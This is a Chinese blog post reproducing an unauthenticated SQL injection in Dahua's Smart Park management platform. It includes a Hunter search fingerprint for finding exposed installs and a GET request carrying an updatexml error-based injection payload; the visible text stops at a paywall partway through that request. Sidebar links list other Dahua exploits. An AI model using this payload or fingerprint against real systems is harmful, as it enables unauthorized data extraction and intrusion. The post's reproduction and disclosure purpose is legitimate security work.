大华智慧园区综合管理平台SQL注入漏洞复现

已于 2023-08-16 08:51:10 修改
阅读量2.2k 收藏 2
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-08-10 22:56:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/132220571
版权

0x01 产品简介

 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

0x02 漏洞概述

   大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。

0x03 复现环境

鹰图指纹:web.body="/WPMS/asset/lib/gridster/"

ce246aae0cc94e208e4ecbacde56d12a.png

 

0x04 漏洞复现 

PoC

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/ex
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
102.大华-智慧园区综合解决方案.pptx
06-07
内容概要:智慧城市通过物联网基础设施、云计算基础设施、地理空间基础设施等新一代信息技术以及维基、社交网络、Fab Lab、Living Lab、综合集成法、网动全媒体融合通信终端等工具和方法的应用,实现全面透彻的感知、宽带泛在的互联、智能融合的应用以及以用户创新、开放创新、大众创新、协同创新为特征的可持续创新。伴随网络帝国的崛起、移动技术的融合发展以及创新的民主化进程,知识社会环境下的智慧城市是继数字城市之后信息化城市发展的高级形态。 适合人群:具备一定方案编写能力基础,智慧城市行业工作1-3年的需求分析师或者产品人员 能学到什么:智慧城市建设方案,技术架构,行业技术要求,行业现状分析等
大华智慧园区综合管理平台SQL注入漏洞复现(0day)
08-11 1211
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
漏洞复现大华智慧园区综合管理平台信息泄露漏洞
晚风不及你
03-11 505
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
2021HW行动漏洞披露和漏洞修复分析.zip
06-30
披露时间 涉及商家/产品 漏洞描述 2021/04/08 启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08 禅道项目管理软件11.6 禅道 11.6 sql注入漏洞 2021/04/08 金山WPS(历史漏洞CVE-2020-25291) 通过点击触发WPS内置浏览器RCE 金山WPS存在远程堆损坏漏洞 2021/04/08 金山V8/V9终端安全系统 金山 V8 -V9 终端安全系统漏洞合集 2021/04/08 金山V8终端安全系统 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞 2021/04/08 天擎 天擎越权访问 2021/04/08 致远OA 致远OA ajax.do 任意文件上传漏洞 2021/04/08 致远OA 致远OA 前台getshell 复现 致远OA任意文件上传 2021/04/08 齐治堡垒机 存在命令执行漏洞,POC疑似已流出 2021/04/08 深信服EDR(历史漏洞) 深信服EDR远程命令执行 CNVD-2020-46552 2021/04/08 深信服VPN(历史漏洞) 深信服 SSL VPN 客户端远程文件下载 2021/04/08 jackson 存在反序列化漏洞,POC疑似已流出 2021/04/08 tomcat 存在反序列化命令执行漏洞,POC疑似已流出 2021/04/08 泛微OA9 泛微OA9前台任意文件上传 2021/04/08 泛微OA8 泛微OA8前台SQL注入 2021/04/08 CoreMail Coremail文件上传漏洞POC - 钓鱼 2021/04/08 用友NC6.5 用友NC反序列化 用友 NC 反序列化RCE漏洞 2021/04/08 dubbo 存在反序列化命令执行漏洞,POC疑似已流出 2021/04/08 Weblogic 某weblogic的T3反序列化0day分析 Weblogic T3 反序列化远程代码执行漏洞 2021/04/08 天擎 360天擎-前台sql注入
DH-DSS-H8900智慧园区综合管理平台
03-01
DH-DSS-H8900 系列是为通用性公共建筑物提供安全和高效管理而打造的智慧园区综合管理平台,通过融合大华在安防和智能化领域的专业经验和前沿技术,集成视频,门禁、报警,停车场,考 勤,访客,可视对讲,信息发布等多个业务 支持可视对讲,门禁一卡通、停车场管理  通过对讲设备管理,实现户户通话,室内报警联动,信息发布等功能  通过门禁管理,实现门禁的开关门,并实现门禁和视频的联动  通过卡口、道闸、LED 设备管理,实现出入口的综合性智能化管理  实现多设备、多路通道、多窗口的实时监控和预览  支持双目监控  支持鱼球联动  支持 36 路录像查询和回放  支持监控计划任务定制,多路多窗口视频轮巡、同时回放  支持本地抓图及本地录像  支持语音对讲  通过接入报警主机,实现报警管理  支持报警联动配置,弹出联动视频、查看多设备报警提示、录像信息功能 支持智能设备应用 支持智能跟踪、人数统计、主从跟随、特征识别、守望者、人脸识别等智能设备应用  通过配置电子地图,随时定位设备,从而轻松地部署管理  视频上墙,配置简单  通过配置巡更点、巡更路线,实现巡更管理
DH 软件平台 DH-DSS-H8900S2-B 智慧园区综合管理平台-智慧园区APP业务介绍和配置说明 V3.001.0000000.2(行业).docx
05-18
DH 软件平台 DH-DSS-H8900S2-B 智慧园区综合管理平台-智慧园区APP业务介绍和配置说明 V3.001.0000000.2(行业).docx
大华智慧园区综合管理平台 任意文件读取漏洞复现
10-10 793
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台存在任意文件上传漏洞
nnn2188185的博客
07-18 818
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上。
大华智慧园区综合管理平台RCE漏洞
holyxp的博客
07-17 1889
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。​ 大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
大华智慧园区综合管理平台searchJson SQL注入漏洞
xiaokp7的博客
09-07 297
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
大华智慧园区综合管理平台任意文件上传漏洞
xiaokp7的博客
07-30 1044
智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在文件上传漏洞,攻击者可以通过请求/emap/devicePoint_addImgIco接口任意上传文件,导致系统被攻击与控制。
大华智慧园区前台任意文件上传(1day)
10-06
大华智慧园区前台任意文件上传(1day)
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
02-27
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
大华智慧小区综合解决方案.doc
05-17
综合物业管理解决方案,涵盖安防,报警,人员管理,车辆管理
全新桥隧坡安全监测解决方案,24h监测效率提升30%
Hi_Target的博客
04-30 446
4月26日,交通运输部党组书记、部长李小鹏在部务会上强调,要高度重视公路桥梁隧道结构监测工作,抓紧推进公路桥梁隧道结构监测系统建设,进一步健全完善公路桥梁隧道结构监测长效运行机制。基于北斗高精度定位技术,采用高精度传感器,融合物联网、人工智能以及三维数字化仿真等技术,实时获取运营数据,掌握桥隧坡的运行状况,可有效减少维护成本,保障运营安全。具备振弦、电压、电流、差阻、RS485、RS232、开关量、继电器、RJ45接口。在全国各省份设有26家分公司,具备专业、高效的演示、演练、支撑、交付等本地化服务能力。
全视通智慧手术室对讲方案,让手术更安全更高效
2301_78035670的博客
04-24 539
全视通智慧手术室对讲方案通过整合等候区公告屏、医护主机、手术间门口机、复苏室主机等多个模块和设备,专用于手术室、护士站、谈话间、复苏室、器械室和其他协同部门,实现了对手术流程的全面管理和监控。
Linux服务器安全基础 - 查看入侵痕迹
eagle89的专栏
04-30 518
Linux服务器安全基础 - 查看入侵痕迹
CNCERT:关于汽车数据处理4项安全要求检测情况的通报 (第一批)
南七小僧的学海无涯
04-30 454
本次检测根据《汽车数据安全管理若干规定(试行)》有关要求,按照GB/T 41871-2022《信息安全技术 汽车数据处理安全要求》和T/CAAMTB 77-2022《汽车传输视频及图像脱敏技术要求与方法》相关技术标准,并参考《汽车数据通用要求(报批稿)》附录C组织实施。检测采用相同的测试要求、测试环境、技术标准和测试流程,包括车外人脸信息等匿名化处理、默认不收集座舱数据、座舱数据车内处理以及处理个人信息显著告知4项要求。e.查阅、复制其个人信息以及删除车内、请求删除已经提供给车外的个人信息的方式和途径;
安全运维 -- splunk 操作手册
最新发布
leeezp的博客
04-30 491
日常运维操作笔记 (持续更新)
智慧园区 xmind
10-02
智慧园区是指将现代信息技术与传统园区相结合,利用人工智能、大数据、云计算等先进技术打造的智能化发展的园区。而XMind作为一种集思想导图和头脑风暴于一体的软件工具,可以帮助人们更高效地组织思维和信息。 在智慧园区中,XMind可以发挥重要的作用。首先,智慧园区需要进行规划和设计,XMind可以帮助园区规划者将各种信息进行整理和分析,制定出合理的规划方案。其次,随着智慧园区的建设和运营,大量数据和信息会产生,XMind可以帮助园区管理者将这些信息进行可视化展示,更好地了解园区的运行情况,做出科学决策。此外,XMind也可以用于园区居民、企业和机构之间的沟通和协作,开展项目管理和团队合作。 智慧园区与XMind的结合,可以提升园区的智能化水平和管理效率。通过利用XMind的工具,园区能够更好地进行规划、管理和决策,更好地处理各种信息和数据。XMind的使用也提高了园区居民、企业和机构之间的协作效率和沟通效果。同时,XMind还可以根据用户需求进行自定义扩展,满足不同园区的特殊需求。 综上所述,智慧园区与XMind的结合将带来更加高效、智能的园区运营和管理。它将成为智慧园区发展的全新动力,并为园区的发展提供支持和助力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值